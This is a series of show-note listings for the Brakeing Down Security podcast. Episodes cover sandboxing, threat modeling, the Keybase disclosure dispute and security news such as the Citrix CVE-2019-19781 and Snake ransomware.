Apologies for the echo in some parts... I did what I could to clean it up, but we were too close and the mics got a bit overzealous...

Sep 07 2019

50mins

Play

Rank #17: Episode 9: Framework for Improving Critical Infrastructure Cybersecurity

Podcast cover
Read more

This week, we got into some discussion about frameworks, and the different types of frameworks available (regulatory, "best practice", and process improvement)

We also looked at the new "Framework for Improving Critical Infrastructure Cybersecurity" ratified and released last month.

Does it meet with our high expectations? You'll just have to listen and find out.

http://www.nist.gov/cyberframework/

Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 3.0http://creativecommons.org/licenses/by/3.0/

Mar 24 2014

33mins

Play

Rank #18: 2017-004-sandboxes, jails, chrooting, protecting applications, and analyzing malware

Podcast cover
Read more

This week, we discuss sandboxing technologies. Most of the time, infosec people are using sandboxes and similar technology for analyzing malware and malicious software.

Developers use it to create additional protections, or even to create defenses to ward off potential attack vectors.

We discuss sandboxes and sandboxing technology, jails, chrooting of applications, and even tools that keep applications honest, in particular, the pledge(2) function in OpenBSD

----------

HITB announcement:

“Tickets for attendance and training are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/

---------

 Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-004-Sandboxing_technology.mp3

iTunes: https://itunes.apple.com/us/podcast/2017-004-sandboxes-jails-chrooting/id799131292?i=1000380833781&mt=2

YouTube: https://www.youtube.com/watch?v=LqMZ9aGzYXA

Join our #Slack Channel! Sign up at https://brakesec.signup.team #RSS: http://www.brakeingsecurity.com/rss #Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast #SoundCloud: https://www.soundcloud.com/bryan-brake Comments, Questions, Feedback, or Suggestions?  Contact us via Email: bds.podcast@gmail.com #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Facebook: https://www.facebook.com/BrakeingDownSec/ #Tumblr: http://brakeingdownsecurity.tumblr.com/ #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582

-----------

Show notes:

Sandboxing tech  -  https://hangouts.google.com/call/yrpzdahvjjdbfhesvjltk4ahgmf

A sandbox is implemented by executing the software in a restricted operating system environment, thus controlling the resources (for example, file descriptors, memory, file system space, etc.) that a process may use.

Various types of sandbox tech

Jails - freebsd

    Much like Solaris 10’s zones, restricted operating system, also able to install OSes inside, like Debian

http://devil-detail.blogspot.com/2013/08/debian-linux-freebsd-jail-zfs.html

Pledge(8)  - new to OpenBSD

    Program says what it should use, if it steps outside those lines, it’s killed

http://www.tedunangst.com/flak/post/going-full-pledge

http://man.openbsd.org/cgi-bin/man.cgi/OpenBSD-current/man2/pledge.2?query=pledge

http://www.openbsd.org/papers/hackfest2015-pledge/mgp00008.html

Chroot - openbsd, linux (chroot jails)

    “A chroot on Unix operating systems is an operation that changes the apparent root directory for the current running process and its children”

    Example: “www” runs in /var/www. A chrooted www website must contain all the necessary files and libraries inside of /var/www, because to the application /var/www is ‘/’

Rules based execution - AppArmor, PolicyKit, SeLinux

    Allows users to set what will be ran, and which apps can inject DLLs or objects.

    “It also can control file/registry security (what programs can read and write to the file system/registry). In such an environment, viruses and trojans have fewer opportunities of infecting a computer.”

https://en.wikipedia.org/wiki/Seccomp

https://en.wikipedia.org/wiki/Linux_Security_Modules

Android VMs

Virtual machines - sandboxes in their own right

    Snapshot capability

    Revert once changes have occurred

    CON: some malware will detect VM environments, change ways of working

Containers (docker, kubernetes, vagrant, etc)

    Quick standup of images

    Blow away without loss of host functionality

    Helpful to run containers as an un-privileged user.

https://blog.jessfraz.com/post/getting-towards-real-sandbox-containers/

Chrome sandbox: https://chromium.googlesource.com/chromium/src/+/master/docs/linux_sandboxing.md

Emulation Vs. Virtualization

http://labs.lastline.com/different-sandboxing-techniques-to-detect-advanced-malware  --seems like a good link

VMware Thinapp (emulator):

https://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=1030224

(continued next page)

Malware lab creation (Alienvault blog):

https://www.alienvault.com/blogs/security-essentials/building-a-home-lab-to-become-a-malware-hunter-a-beginners-guide

https://www.reverse.it/

News: (assuming it goes short)

SHA-1 generated certs will be deprecated soon - https://threatpost.com/sha-1-end-times-have-arrived/123061/

(whitelisting files in Apache)

https://isc.sans.edu/diary/Whitelisting+File+Extensions+in+Apache/21937

http://blog.erratasec.com/2017/01/the-command-line-for-cybersec.html

https://github.com/robertkuhar/java_coding_guidelines

https://www.us-cert.gov/sites/default/files/publications/South%20Korean%20Malware%20Attack_1.pdf#

https://www.concise-courses.com/security/conferences-of-2017/

Feb 06 2017

52mins

Play

Rank #19: 2016-047: Inserting Security into the SDLC, finding Privilege Escalation in poorly configured Linux systems

Podcast cover
Read more

Just a quick episode this week...

As part of the Brakesec Book Club (join us on our #Slack Channel for more information!) we are discussing Dr. Gary McGraw's book "Software Security: Building Security In" (Amazon Link: https://is.gd/QtHQcM)

We talk about the need to inserting security into your company's #SDLC... but what exactly can be done to enable that? I talk about abuse cases, #risk #analysis, creating test cases, pentesting, and #security #operations are all methods to do so.

Finally, I discovered a blog talking about ways to discover configuration errors on Linux systems that might allow #privilege #escalation to occur. Using these tools as part of your hardening processes could lower the risk of a bad actor gaining elevated privileges on your *unix hosts

http://rajhackingarticles.blogspot.com/2016/11/4-ways-to-get-linux-privilege-escalation.html

You can find the github of this script and the audit software that I mentioned below:

https://github.com/rebootuser/LinEnum.git     #Lynis (from CISOfy: https://cisofy.com/lynis/   Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-047-inserting_security_into_the_SDLC_finding_Linux_priv_esc.mp3   #iTunes: https://itunes.apple.com/us/podcast/2016-047-inserting-security/id799131292?i=1000378329598&mt=2   #YouTube:  https://www.youtube.com/watch?v=Kd_ZzvVNqoA

#RSS: http://www.brakeingsecurity.com/rss

#Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969

#SoundCloud: https://www.soundcloud.com/bryan-brake

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast

#Twitter: @brakesec @boettcherpwned @bryanbrake

#Facebook: https://www.facebook.com/BrakeingDownSec/

#Tumblr: http://brakeingdownsecurity.tumblr.com/

#Player.FMhttps://player.fm/series/brakeing-down-security-podcast

#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr

#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582

Nov 28 2016

19mins

Play

Rank #20: 2017-036-Adam Shostack talks about threat modeling, and how to do it properly

Podcast cover
Read more

Direct Link:  http://traffic.libsyn.com/brakeingsecurity/2017-036-Adam_Shostack-threat_modeling.mp3

Adam Shostack has been a fixture of threat modeling for nearly 2 decades. He wrote the 'threat modeling' bible that many people consult when they need to do threat modeling properly.

We discuss the different threat modeling types (STRIDE, DREAD, Trike, PASTA) and which ones Adam enjoys using.

Mr. Boettcher asks how to handle when people believe an OS is better than another, how to do threat modeling to decide which OS should be the one to use.

Stay after for a special post-show discussion with Adam about his friend Stephen Toulouse (@stepto).

RSS: http://www.brakeingsecurity.com/rss

Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link:  https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2

#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast

Join our #Slack Channel! Sign up at https://brakesec.signup.team

#iHeartRadio App:  https://www.iheart.com/show/263-Brakeing-Down-Securi/

#SoundCloud: https://www.soundcloud.com/bryan-brake

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FMhttps://player.fm/series/brakeing-down-security-podcast

#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr

#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/

SHOW NOTES:

Ideas and suggestions here:

Start with “What is threat modeling?”   What is it, why do people do it, why do organizations do it?

What happens when it’s not done effectively, or at all?

At what point in the SDLC should threat modeling be employed?

Planning?

Development?

Can threat models be modified when new features/functionality gets added?

Otherwise, are these just to ‘check a compliance box’?

Data flow diagram (example) -

process flow

External entities

Process

Multiple Processes

Data Store

Data Flow

Privilege Boundary

Classification of threats-

STRIDE - https://en.wikipedia.org/wiki/STRIDE_(security)

DREAD - https://en.wikipedia.org/wiki/DREAD_(risk_assessment_model)

PASTA - https://www.owasp.org/images/a/aa/AppSecEU2012_PASTA.pdf

Trike -  http://octotrike.org/

https://en.wikipedia.org/wiki/Johari_window

Butler Lampson, Steve Lipner link: https://www.nist.gov/sites/default/files/documents/2016/09/16/s.lipner-b.lampson_rfi_response.pdf

Escalation Of Privilege card game: https://www.microsoft.com/en-us/download/details.aspx?id=20303

NIST CyberSecurity Framework: https://www.nist.gov/cyberframework

Data Classification Toolkit - https://msdn.microsoft.com/en-us/library/hh204743.aspx

Microsoft bug bar (security) - https://msdn.microsoft.com/en-us/library/windows/desktop/cc307404.aspx

Microsoft bug bar (privacy) - https://msdn.microsoft.com/en-us/library/windows/desktop/cc307403.aspx

OWASP threat Modeling page: https://www.owasp.org/index.php/Application_Threat_Modeling

OWASP Threat Dragon - https://www.owasp.org/index.php/OWASP_Threat_Dragon

Emergent Design:  https://adam.shostack.org/blog/2017/10/emergent-design-issues/

https://www.researchgate.net/profile/William_Yurcik/publication/228634178_Threat_Modeling_as_a_Basis_for_Security_Requirements/links/02bfe50d2367e32088000000.pdf

Robert Hurlbut (workshop presenter at SourceCon Seattle) https://roberthurlbut.com/Resources/2017/NYMJCSC/Robert-Hurlbut-NYMJCSC-Learning-About-Threat-Modeling-10052017.pdf (much the same content as given at Source)

Adam’s Threat modeling book

http://amzn.to/2z2cNI1 -- sponsored link

https://www.amazon.com/Threat-Modeling-Designing-Adam-Shostack/dp/1118809998/ref=mt_paperback?_encoding=UTF8&me=

Is the book still applicable?

New book

What traps do people fall into?  Attacker-centered, asset-centered approaches

Close with “how do I get started on threat modeling?”

SecShoggoth’s Class “intro to Re”

Johari window? http://www.selfawareness.org.uk/news/understanding-the-johari-window-model

Oct 29 2017

1hr 34mins

Play

2020-001- Android malware, ugly citrix bugs, and Snake ransomware

Podcast cover
Read more

Educause conference: https://events.educause.edu/security-professionals-conference/2020/hotel-and-travel

Amanda’s Training that everyone should come to!!! https://nolacon.com/training/2020/security-detect-and-defense-ttx

Follow twitter.com/infosecroleplay

 

Part 1: New year, new things

Discussion:

What happened over the holidays? What did you get for christmas?

PMP test is scheduled for 10 March

Proposal:  Anonymous Hacker segment

    Similar to “The Stig” on Top Gear. If you would like to come on and discuss any topic you would like. You’ll have anonymity, we won’t share your contact info

  1. Will allow people worried that they’ll be ridiculed to share their knowledge
  2. We can record your 20-30 segment whenever (will need audio/video for it)
  3. You can take a tutorial from another site (or your own) and review it for us
  4. 1-2 segments per month 
  5. We can discuss content prior to (we won’t put you on the spot)
  6. We do have a preliminary

News:

 

Google removed 1.7K+ Joker Malware infected apps from its Play Store                   

Full article: https://securityaffairs.co/wordpress/96295/malware/joker-malware-actiity.html

Excerpt:

Google revealed it successfully removed more than 1,700 apps from the Play Store over the past three years that had been infected with the Joker malware.

Google provided technical details of its activity against the Joker malware (aka Bread) operation during the last few years.

The Joker malware is a malicious code camouflaged as a system app and allows attackers to perform a broad range of malicious operations, including disable the Google Play Protect service, install malicious apps, generate fake reviews, and show ads.

The spyware is able to steal SMS messages, contact lists and device information along with to sign victims up for premium service subscriptions.

In October, Google has removed from Google Play 24 apps because they were infected with Joker malware, the 24 malicious apps had a total of 472,000 installs.

“Over the past couple of weeks, we have been observing a new Trojan on GooglePlay. So far, we have detected it in 24 apps with over 472,000+ installs in total.” 

apps typically fall into two categories: SMS fraud (older versions) and toll fraud (newer versions). Both of these types of fraud take advantage of mobile billing techniques involving the user’s carrier.” reads the post published by Google.

The newer versions of the Joker malware were involved in toll fraud that consist of tricking victims into subscribing to or purchasing various types of content via their mobile phone bill.

WAP billing: https://en.wikipedia.org/wiki/WAP_billing

Example: “pokemon go allows in-app purchases

Over 25,000 Citrix (NetScaler) endpoints vulnerable to CVE-2019-19781

Full Article: https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/

Excerpt:

On Friday, January 10, 2020, our honeypots detected opportunistic mass scanning activity originating from a host in Germany targeting Citrix Application Delivery Controller (ADC) and Citrix Gateway (also known as NetScaler Gateway) servers vulnerable to CVE-2019-19781. This critical vulnerability allows unauthenticated remote attackers to execute commands on the targeted server after chaining an arbitrary file read/write (directory traversal) flaw.

 

What type of organizations are affected by CVE-2019-19781?  (industries with typically poor or outdated security practices… --brbr)

4,576 unique autonomous systems (network providers) were found to have vulnerable Citrix endpoints on their network. We’ve discovered this vulnerability currently affects:

  • Military, federal, state, and city government agencies
  • Public universities and schools
  • Hospitals and healthcare providers
  • Electric utilities and cooperatives
  • Major financial and banking institutions
  • Numerous Fortune 500 companies

 

How is CVE-2019-19781 exploited and what is the risk?

This critical vulnerability is easy for attackers to exploit using publicly available proof-of-concept code. Various methods demonstrating how to exploit CVE-2019-19781 have been posted on GitHub by Project Zero India and TrustedSec. A forensic guide is available detailing how to check Citrix servers for evidence of a compromise.

Further exploitation of this vulnerability could be used to spread ransomware (similar to CVE-2019-11510) and cryptocurrency mining malware on sensitive networks. If multiple servers are compromised by the same threat actor, they could be weaponized for coordinated malicious activity such as DDoS attacks.

SNAKE #Ransomware Targets Entire Corporate Systems?

Full Article: https://www.ehackingnews.com/2020/01/snake-ransomware-targets-entire.html

Excerpt:

The new Snake Ransomware family sets out to target the organizations’' corporate networks in all their entirety, written in Golang and containing a significant level of obfuscation, the observations and disclosure for the attacks were made by a group of security specialists from the MalwareHunterTeam.

The Ransomware upon successful infection subsequently erases the machine's Shadow Volume Copies before ending different processes related to SCADA frameworks, network management solutions, virtual machines, and various other tools.

After that, it continues to encrypt the machine's files while skirting significant Windows folders and system files. As a feature of this procedure, it affixes "EKANS" as a file marker alongside a five-character string to the file extension of each file it encrypts. The threat wraps up its encryption routine by dropping a ransom note entitled "Fix-Your-Files.txt" in the C:\Users\Public\Desktop folder, which instructs victims to contact "bapcocrypt@ctemplar.com" so as to purchase a decryption tool.

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Jan 13 2020

38mins

Play

2019-046-end of the year, end of the decade, predictions, and how we've all changed

Podcast cover
Read more
End of year, end of decade

    Are things better than 10 years ago? 5 years ago?

    If there was one thing to change things for the better, what would that be?

 

Good, Bad, Ugly 

Did naming vulns make things better?

    Which industries are doing a good job of securing themselves? Finance?

    What do you wished never happened (security/compliance wise)?

    Ransomware infections with no bounties

    Still have people believing “Nessus” is a pentest

https://nrf.com/

https://www.retailitinsights.com/eventscalendar/eventdetail/1c77d5c6-8625-4f2b-bb98-89cca6590c49

https://monitorama.com/

https://www.apics.org/credentials-education/events

 

The Future

    PREDICTIONS!!!

    Bryan: The rise of the vetting programs  (Companies will want to vet content creators in their eco-systems)

    Cybuck: An uptick in surveillance tech; both disguised as cool home smart gadgets and straight up public safety.  Triggering a US GDPR type response.

Injection remains as the undisputed heavyweight champion of app sec vulnerability (OWASP top 10).  And wishful thinking...broken authentication moves lower, denial of service goes down. https://twitter.com/WeldPond/status/1207383327491137536/photo/1

JB: a major change in social media/generational shift in how we use it, legal or focus on new types of  mobile tech for example… Human networking in real-life in the age of ‘social’ ….“When you hire someone… you also hire their rolodex”  --- what do you think about this statement?  ..it’s role in InfoSec? Talent?

JB- shouted out https://github.com/redcanaryco/atomic-red-team (Invoke-Atomic framework with powershell now on Linux, OSX, and Windows)

JB - Link to hunting/stopping-human-trafficing org i mentioned :

Shoutout

 Sherrie Caltagirone, Executive Director, Global Emancipation Network @GblEmancipation

https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1569941622.pdf

Mentioned https://monitorama.com/ https://github.com/viq/air-monitoring-scripts (viq form brake sec )

   

Other topics

    Talk about where you were 10 years ago, and what you did to get where you are?

    Best Hacking tool?

    Best Enterprise Tool?

 

Recent news

https://www.zdnet.com/article/more-than-38000-people-will-stand-in-line-this-week-to-get-a-new-password/

https://www.phoronix.com/scan.php?page=news_item&px=CERN-MALT-Microsoft-Alternative

https://www.iotworldtoday.com/2019/12/21/2020-predictions-apis-become-a-focus-of-iot-security/

https://www.jonesday.com/en/insights/2018/10/california-to-regulate-security-of-iot-devices 

News Stories from 2010 (see if they still make sense, or outdated)

https://www.infosecurity-magazine.com/magazine-features/what-makes-a-ciso-employable/

https://www.csoonline.com/article/2231454/verizon-s-2010-dbir--rise-in-misuse--malware-and-social-engineering.html

https://www.owasp.org/index.php/OWASPTop10-2010-PressRelease

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Dec 23 2019

1hr 18mins

Play

2019-045-Part 2-Noid, Dave Dittrich, empowered teams, features vs. security

Podcast cover
Read more

The day after part 1

Keybase halted the spacedrop the day after the first podcast is complete...

Security failures in implementation

    “We need to push this to market, we’ll patch it later!”

Risk management discussion for project managers (PMP)

CIA Triad… where does ‘business goals’ fit? Security is at odds with the bottom line

Reference Noid’s Bsides Seattle talk and podcast earlier this year.

Other companies that have made security mistakes in the name of business

Practical Pentest Labs storing passwords in the clear

https://twitter.com/mortalhys/status/1202867037120475136

https://web.archive.org/web/20191207132548/https://twitter.com/mortalhys/status/1202867037120475136

https://twitter.com/piaviation/status/1202994484172218368

T-Mobile Austria partial password issues:

https://www.pcmag.com/news/360301/t-mobile-austria-admits-to-storing-passwords-partly-in-clear

    No one was championing security, because no one considered the problems with partial disclosure of the passphrase in an account.

    Marketing people on your socMedia accounts do NOT help allay security issues (cause they didn’t have escalation procedures for vuln disclosure)

        Insider threats could takeover accounts

Follow-up from last week’s show with Bea Hughes:

I liked the interesting docussion about security and DevOps teams with Bea Hughes in your recent podcast. When you mentioned you are taking your PMP for agile I'm surprised you did not mention the term "product owner".  You were asking who cares about security that you, as a security guy can talk to. Bea mentioned that it was the "stakeholders", but in the agile process the "product owner" is the team's advocate for the "stakeholders".

And, you also mentioned "PM", as in project manager. In an agile world, the typical PM role is minimized. Actually, the PM is removed entirely ideally in favor of empowered teams. Empowered teams understand that good products are reliable and secure. (Secure because the security CIA includes "availability" and "integrity" aka reliability.)

As Directory of DevOps for my 4,000 persons strong consulting company I'm working with our security team to push responsibility for security to our development teams. Empowering them to take the time and bear the costs of using security tools prior to release and during system operation is what we are working on now, as we roll into 2020. 

If the ‘product owner’ or ‘empowered team’ does not consider security a priority/requirement, then who champions security? It only becomes a priority when something bad happens, like a breach.

“Empowered teams”

 Some people aren’t fans:   https://hackernoon.com/the-surprising-misery-of-empowered-teams-35c3679cf11e

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Dec 18 2019

1hr 2mins

Play

2019-044-Noid and Dave Dittrich discusses recent keybase woes - Part 1

Podcast cover
Read more

Patreon donor goodness: Scott S. and Ion S.

@_noid_ @davedittrich

Their response:

 “it’s not a bug, it’s a feature”

    “Don’t write a blog post that will point out the issue”

    “You pointing out our issues makes things more difficult for us”

    “It’s a free service, why are you hurting us?”

https://keybase.io/docs/bug_reporting

Nov 22nd

Noid (@_noid_) Keybase discussion blog post

https://www.whiskey-tango.org/2019/11/keybase-weve-got-privacy-problem.html

Reddit post showing potential SE attacks occurring: https://www.reddit.com/r/Keybase/comments/e6uou3/hi_guys_i_received_a_message_today_that_is/

Keybase’s decision to fix it came out after The Register asked them about the issue…

Dec 4th

https://keybase.io/blog/dealing-with-spam

Dec 5th.

https://www.theregister.co.uk/2019/12/05/keybase_struggles_with_harassment/

Problems with the implementation:  

        Requiring admins for Keybase to decide what’s wrong or if they need to be deleted

        Additional dummy accounts being created on other sites (keybase, twitter, git, reddit, etc), generating problems for those services (as if Twitter doesn’t have enough issues with bots/shitty people)

        Cryptocurrency = trolls/phishing/SE attempts to get folks to hand over their lumens (what’s the motivation of creating the coin?)

        They’ve already opened the spam door, and they’ll not be able to shut it.

Once they took the VC and aligned themselves with Stellar, the attack surface changes

    From Account takeover (integrity attacks) to deception (social engineering)

What is keybase?

    Social network?

    E2E chat

Encrypted file share/storage?

    CryptoCurrency Company? 

    Secure git repo protector?

Which ones do they do well?  

How could they have solved the spam issue?

    Made the cryptocoin a separate application?

        Even their /r/keybase is filling up with spammers asking about their Lumens

How could they fix it?

    You can’t contact someone unless that person allows you to.

    Allow someone to contact you, but do not allow adding to teams without permission

https://news.ycombinator.com/item?id=21719702 (ongoing HN thread)

Noid isn’t the only person with issues in Keybase: https://vicki.substack.com/p/keybase-and-the-chaos-of-crypto

https://it.slashdot.org/story/19/12/06/1610259/keybase-moves-to-stop-onslaught-of-spammers-on-encrypted-message-platform

https://keybase.io/docs-assets/blog/NCC_Group_Keybase_KB2018_Public_Report_2019-02-27_v1.3.pdf

Stephen Carter's definition of “integrity.”

Integrity, as I will use the term, requires three steps: (1) discerning what is right and what is wrong, (2) acting on what you have discerned, even at personal cost; and (3) saying openly that you are acting on your understanding of right from wrong.

 — Stephen Carter, “Integrity.” Harper-Collins. https://www.harpercollins.com/9780060928070/integrity/

Can the person [who took the controversial act] explain their reasoning, based on principles they can articulate and would follow even if it meant they paid a price? Or do they selectively choose principles in arbitrary ways so as to fit the current circumstances in order to guarantee they get an outcome that benefits them?

noid’s blog post clearly documents the timeline of interactions with Keybase, including: (1) providing detailed steps to reproduce; (2) suggesting mitigations that could be implemented in the architecture; (3) providing guidance to users to protect themselves when the vulnerability disclosure was made public; and (4) justifying his decision to go public by citing and following a vulnerability disclosure policy of a major industry leader in this area, Google:

Following Google Security’s guidelines for issues being actively exploited in the wild, I chose to release this information 7 days after I last heard from Keybase. The ACM Code of Conduct has several sections that could apply here: 1.1 Contribute to society and to human well-being, acknowledging that all people are stakeholders in computing. 1.2 Avoid harm. 1.6 Respect privacy. 2.1 Strive to achieve high quality in both the processes and products of professional work. 2.7 Foster public awareness and understanding of computing, related technologies, and their consequences. 3.1 Ensure that the public good is the central concern during all professional computing work. 3.7 Recognize and take special care of systems that become integrated into the infrastructure of society.

The right to privacy of your information, as well as the right to choose with whom you associate and communicate, are both arguably duties based on the concept of autonomy (i.e., your right to choose).

In biomedical and behavioral research, the principle involved here is known as Respect for Persons and is best recognized as the idea of informed consent. Giving users autonomy in making their data public, but not giving them autonomy in who they allow to communicate with them and add them to “teams,” could be viewed as conflicting as regards this principle.

This is in fact precisely what noid brought up in his initial communication with Keybase:

I had a random guy I don’t follow add me to a team and start messaging me about cryptocurrency stuff. This really shouldn’t be default behavior. This can result in a spam or harassment vector (hence why I’m reluctant to post it on the open forum). Ideally the default behavior should be that no one can add you to a team without your consent. Then maybe have an option of allowing those you follow to be able to do so, and as a final option let anyone add you to a team (but make sure folks know this isn’t recommended).

Dec 10 2019

1hr 1min

Play

2019-043-Bea Hughes, dealing with realistic threats in your org

Podcast cover
Read more

Realistic Threats 

Nation states aren’t after you

https://twitter.com/beajammingh/status/1191884466752385025

https://twitter.com/beajammingh/status/1198671660150226946

https://twitter.com/beajammingh/status/1198671952824565762

https://www.leviathansecurity.com/blog/the-calculus-of-threat-modeling

What are credible threats?

Malicious insiders - 

Non-malicious insiders - https://www.scmagazine.com/home/security-news/not-every-insider-threat-is-malicious-but-all-are-dangerous/

    Education issue?

    Is there such a thing as ‘non-malicious’ or is this just bunk?

Real threats

https://resources.infosecinstitute.com/5-new-threats-every-organization-prepared-2018/

CIO magazine threats -- buzzword threats (we should totally containerize all the things)

Vulns that have names (blue team is stuck dealing with ‘theoretical’ issues e.g. SPECTRE/MELTDOWN)

Lack of well-priced training?

    Dev Training?

    Security Training?

Better management communication will reduce threats

    Building trust so they don’t freak when ‘$insert_named_vuln’ shows up

    Gotta frame it to business needs

    “Everyone is vulnerable” - keep FUD to a minimum, don’t exaggerate.

    Know your industry’s threats (phishing, money transfer fraud, malware

Patreon donor:  Michael K. $10 patron!

Layer8conf - https://www.workshopcon.com/events

https://layer8conference.com/

Regarding diversity scholarships, it's being worked on and the number of available spots will highly depend on the number of Sponsorships the conference secures.

As a side note WorkshopCon will sponsor a number of Layer8 conference tickets if people follow @WorkshopCon on Twitter and tweet to us why they are interested in Social Engineering and OSINT topics with hashtag #sendMeToLayer8. We will select folks from those tweets with the emphasis being on folks coming from underrepresented or minority groups.

In terms of sponsorship information for Layer8, Patrick wants people to send an email to sponsors@layer8conference.com

Please let us know if you have any other questions, and thank you so much for giving us a hand spreading the word!!!

Saturday June 6, 2020, RI Convention Center

https://www.dianainitiative.org/

https://twitter.com/DianaInitiative

Conference in Las Vegas (Aug 6-7, 2020) (Thu & Fri)

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Dec 04 2019

1hr 10mins

Play

2019-042-CircuitSwan, Gitlabs, Job descriptions that don't suck, layer8con

Podcast cover
Read more

Diana Initiative

@circuitswan @dianainitiative

https://www.dianainitiative.org/

https://twitter.com/DianaInitiative

Conference in Las Vegas (Aug 6-7, 2020) (Thu & Fri)

info@dianainitiative.org

Topics  

  1. Diana initiatives
    1. Past
      1. 2015 - idea at defcon 23
      2. 2016-17-18 growing but got too big!
      3. 2019 got our own space, ~800 tickets
      1. 2020 plans-westin again, 2 speaking tracks and 1 workshop track, solder village, career village, CTF, lock picking
      2. Mentoring both CFP and presenters this year! (expansion from last year)
